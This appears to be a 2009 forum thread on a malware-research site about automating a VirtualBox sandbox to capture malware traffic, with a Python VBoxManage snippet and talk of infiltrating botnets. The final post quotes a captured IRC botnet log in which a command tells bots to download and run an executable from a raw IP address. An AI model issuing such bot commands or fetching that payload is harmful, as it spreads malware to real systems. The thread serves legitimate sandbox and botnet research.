Malware Domain List

Malware Related => Tools of the trade / Internet News => Topic started by: log0 on August 09, 2009, 12:02:56 pm

Title: What tools can I use to script VMWare Workstation in Python?
Post by: log0 on August 09, 2009, 12:02:56 pm
Hi all gurus,

Could use some help and directions.

I have Windows in VMware that I want to control from my VM Host to start/stop/revert/run programs. I am aiming to build an automated, simplified but specialized malware sandbox to extract pcap files (yadayada... anubis is too slow). However, the Pyvix doesn't seem to be updated for 3 years already, and it isn't just the compilation issue ( it seems ) but mismatching binaries, and so.

My questions :
1. If I want to script VMware workstation in Python, what are the solutions out there?
2. What are the usual solutions as used by you experts in industries and focused academics?

Thank you.

Log0



Title: Re: What tools can I use to script VMWare Workstation in Python?
Post by: SysAdMini on August 09, 2009, 12:22:01 pm
You have to install VMWARE VIX API first.

http://www.vmware.com/support/developer/vix-api/

This API provides bindings for C, Perl, and COM (Visual Basic, VBScript, C#).
VMware doesn't provide bindings for Python, but there are Python bindings.
Look here:

http://groups.google.com/group/vmkernelnewbies/browse_thread/thread/b910fe85b1eebcb2

I haven't used the python bindings, so I don't know how well it works.

 
Title: Re: What tools can I use to script VMWare Workstation in Python?
Post by: log0 on August 09, 2009, 02:08:34 pm
Hi SysAdMini,

Yes I have installed the ViX. =)

Here is the extract I obtained from pyvix, it looks oooooooooooooooold !!!!!!

pyvix-2006.07.18-source.zip          32.2 KiB     Tue Jul 18 2006 14:44     939

So, I'm just curious if it's a "declared dead" library?

===

BTW, so most people still use the C interface of ViX ( perhaps Perl? ) to automate only?
Title: Re: What tools can I use to script VMWare Workstation in Python?
Post by: log0 on August 09, 2009, 02:42:05 pm
Aha, that new updated code works better... got some new errors, but there goes the progress. Thanks SysAdMini. =)
Title: Re: What tools can I use to script VMWare Workstation in Python?
Post by: log0 on August 09, 2009, 04:14:12 pm
Didn't really mean to bug... anyone got this error?

I found this is a pretty common unanswered problem ... not any solutions I got ...

VIX_E_WRAPPER_SERVICEPROVIDER_NOT_FOUND      = 22003
pyvix.vix.VIXException: The system returned an error. Communication with the virtual machine may have been interrupted

I used the powerOn.c helloworld code provided by VMware. Anyway... it fails at connect.
I'll continue to work on it and see what's going to come back... but if anyone has met this, please kindly offer advice.

I really need to post an article on this common problem after I've solved it. =)

Thank you very much.
Title: Re: What tools can I use to script VMWare Workstation in Python?
Post by: log0 on August 11, 2009, 05:05:09 pm
Yayayaya, I abandoned vmware and picked up (free) virtualbox. Somehow the installation of ViX didn't work quite well, but why bother fixing it when there's an easier way. Waste no time.

There goes vboxmanage, which does it in a simpler way.

For those interested, I'm building an automated tool for infiltrating botnets... let's see what comes out.

Thanks.
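
The revert/start/capture/stop cycle discussed in this thread, driven through VBoxManage from Python, as an added example that is not part of any post here. It assumes VBoxManage is on the host's PATH and that the snapshot was taken with the VM powered off; the VM name, snapshot name and pcap path are placeholders, and launching the sample inside the guest is outside its scope.

```python
import subprocess
import time

VBOX = "VBoxManage"  # assumption: VBoxManage is on the host's PATH


def build_plan(vm, snapshot, pcap_path):
    """Return (setup, teardown) VBoxManage argv lists for one sandbox run."""
    setup = [
        # Start every run from the same known-clean state.
        [VBOX, "snapshot", vm, "restore", snapshot],
        # Trace NIC 1 to a pcap file on the host, outside the guest's reach.
        # Assumption: the snapshot is a powered-off one, so modifyvm is allowed.
        [VBOX, "modifyvm", vm, "--nictrace1", "on", "--nictracefile1", pcap_path],
        [VBOX, "startvm", vm, "--type", "headless"],
    ]
    # The next restore resets the NIC trace setting, so teardown only stops the VM.
    teardown = [[VBOX, "controlvm", vm, "poweroff"]]
    return setup, teardown


def run_sample(vm, snapshot, pcap_path, seconds,
               run=subprocess.run, sleep=time.sleep):
    """Run one capture cycle and return the commands that completed.

    The VM is powered off even if startvm fails or times out, so a
    half-started guest is never left running with a live sample in it.
    """
    setup, teardown = build_plan(vm, snapshot, pcap_path)
    executed = []
    start_attempted = False
    try:
        for argv in setup:
            if argv[1] == "startvm":
                start_attempted = True
            run(argv, check=True, timeout=120)
            executed.append(argv)
        sleep(seconds)  # let the guest generate traffic for the capture window
    finally:
        if start_attempted:
            for argv in teardown:
                # check=False: poweroff on an already-stopped VM is not fatal.
                run(argv, check=False, timeout=120)
                executed.append(argv)
    return executed
```

The `run` and `sleep` parameters exist so the cycle can be exercised with a stub on a machine that has no VirtualBox installed.
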
Title: Re: What tools can I use to script VMWare Workstation in Python?
Post by: MysteryFCM on August 12, 2009, 06:33:15 pm
Look forward to seeing the results :) (looking into setting up automated analysis myself too)
Title: Re: What tools can I use to script VMWare Workstation in Python?
Post by: SysAdMini on August 12, 2009, 06:40:05 pm
I tested virtualbox a few months ago. I was unable to set up a network bridge to my wireless lan adapter.
I'm wondering if it works in the current virtualbox version. If yes, then I would give it a second chance.
Title: Re: What tools can I use to script VMWare Workstation in Python?
Post by: log0 on August 22, 2009, 04:40:53 am
>>SysAdMini

oops... a lil busy and then workin' then.

Didn't try bridge wireless before, top two from google :
http://ubuntuforums.org/showthread.php?t=724783h
http://forums.virtualbox.org/viewtopic.php?t=1787

Any luck?

I basically have a tool that can grep traffic for myself, now need to piece up a bot and everything altogether.

===

>> MysteryFCM

Sure, it is just a few pieces of spread out technology pieced together... I guess a lot of ppl in MDL alrdy got them?
Title: Re: What tools can I use to script VMWare Workstation in Python?
Post by: log0 on August 23, 2009, 01:00:32 pm
I guess most of these are basic tools to most ppl...everyone gotta build their own guns!

The malware caught - 6/41 ( 14.63 % ) ouch.


Basic

2009-08-23 18:27:20,644 - log-6 - INFO - Received : [:irc.efnet.com 332 [ #xx6 :.flushdns |.down -S |.update -S |.update http://94.76.194.116/xx8.exe x5s5g6q3x1n3.exe x5s5g6q3x1n3]
...

but sadly, still doing it wrong. =)

2009-08-23 18:27:23,560 - log-6 - INFO - Received : [ERROR :Closing Link: [[<my ip>] (Client hat die Verbindung getrennt)]

German stuffs.

Workin' workin' ...